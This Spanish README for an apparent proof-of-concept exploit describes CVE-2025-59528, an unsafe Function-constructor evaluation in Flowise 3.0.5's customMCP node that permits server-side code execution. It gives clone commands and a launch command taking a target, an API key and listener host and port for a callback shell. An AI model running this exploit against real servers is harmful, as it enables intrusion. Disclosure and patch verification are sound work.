
CVE-2025-59528 Prueba de concepto
Este repositorio contiene una prueba de concepto que demuestra CVE-2025-59528 en Flowise v3.0.5.
La vulnerabilidad existe en el nodo customMCP, donde la entrada mcpServerConfig proporcionada por el usuario se procesa de una manera que conduce a la ejecución de código JavaScript mediante una evaluación insegura utilizando el constructor Function.
| Afectada | Corregida |
|---|---|
| 3.0.5 | 3.0.6 |
Un usuario autenticado podría ejecutar código JavaScript arbitrario en el servidor, lo que potencialmente conduciría a la ejecución remota de código.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Esta herramienta se proporciona solo con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o los daños causados por la herramienta.